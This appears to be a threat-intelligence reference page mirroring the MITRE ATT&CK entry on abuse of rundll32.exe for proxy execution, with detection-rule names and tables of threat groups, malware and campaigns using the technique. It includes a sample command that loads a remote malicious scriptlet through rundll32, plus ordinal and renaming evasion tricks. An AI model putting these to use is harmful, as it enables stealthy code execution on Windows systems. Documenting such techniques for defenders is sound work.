Sub-technique of T1218 System Binary Proxy Execution.View on attack.mitre.org
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. For example, ClickOnce can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.
Threat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.
Rules on DetectionCode tagged with T1218.011.
| Rule | Type | Risk | Data source |
|---|---|---|---|
| Detect Rundll32 Application Control Bypass - advpack | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Detect Rundll32 Application Control Bypass - setupapi | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Detect Rundll32 Application Control Bypass - syssetup | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| RunDLL Loading DLL By Ordinal | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Rundll32 Control RunDLL Hunt | Hunting | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Rundll32 Control RunDLL World Writable Directory | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Rundll32 DNSQuery | TTP | NULL | Sysmon EventID 22 |
| Rundll32 LockWorkStation | Anomaly | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Rundll32 Process Creating Exe Dll Files | TTP | NULL | Sysmon EventID 11 |
| Rundll32 with no Command Line Arguments with Network | TTP | NULL | Sysmon EventID 1 AND Sysmon EventID 3 |
| Suspicious IcedID Rundll32 Cmdline | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Suspicious Rundll32 dllregisterserver | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Suspicious Rundll32 no Command Line Arguments | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Suspicious Rundll32 PluginInit | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Suspicious Rundll32 Rename | Hunting | NULL | Sysmon EventID 1 |
| Suspicious Rundll32 StartW | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Windows Application Whitelisting Bypass Attempt via Rundll32 | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Windows LOLBAS Executed As Renamed File | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Windows LOLBAS Executed Outside Expected Path | Anomaly | NULL | Sysmon EventID 1, Windows Event Log Security 4688 |
| Windows Rundll32 Apply User Settings Changes | Anomaly | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Windows Rundll32 Load DLL in Temp Dir | Anomaly | NULL | Sysmon EventID 1 |
| Windows Rundll32 with Non-Standard File Extension | Anomaly | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Used by | Procedure example |
|---|---|
| GroupAPT19 | APT19 configured its payload to inject into the rundll32.exe. |
| GroupAPT28 | APT28 executed CHOPSTICK by using rundll32 commands such as |
| GroupAPT3 | APT3 has a tool that can run DLLs. |
| GroupAPT32 | APT32 malware has used rundll32.exe to execute an initial infection process. |
| GroupAPT38 | APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools. |
| GroupAPT41 | APT41 has used rundll32.exe to execute a loader. |
| GroupAquatic Panda | Aquatic Panda used rundll32.exe to proxy execution of a malicious DLL file identified as a keylogging binary. |
| GroupBlue Mockingbird | Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe. |
| Used by | Procedure example |
|---|---|
| MalwareADVSTORESHELL | ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence. |
| MalwareAttor | Attor's installer plugin can schedule rundll32.exe to load the dispatcher. |
| MalwareBackdoor.Oldrea | Backdoor.Oldrea can use rundll32 for execution on compromised hosts. |
| MalwareBad Rabbit | Bad Rabbit has used rundll32 to launch a malicious DLL as |
| MalwareBisonal | Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: |
| MalwareBLINDINGCAN | BLINDINGCAN has used Rundll32 to load a malicious DLL. |
| MalwareBoomBox | BoomBox can use RunDLL32 for execution. |
| MalwareBriba | Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs. |
| Used by | Procedure example |
|---|---|
| Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, Sandworm Team used a backdoor which could execute a supplied DLL using `rundll32.exe`. |
| CampaignC0015 | During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process. |
| CampaignC0018 | During C0018, the threat actors used `rundll32` to run Mimikatz. |
| CampaignC0021 | During C0021, the threat actors used `rundll32.exe` to execute the Cobalt Strike Beacon loader DLL. |
| CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`. |
| CampaignOperation Spalax | During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers. |
| CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 used `Rundll32.exe` to execute payloads. |
| CampaignWater Curupira Pikabot Distribution | Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.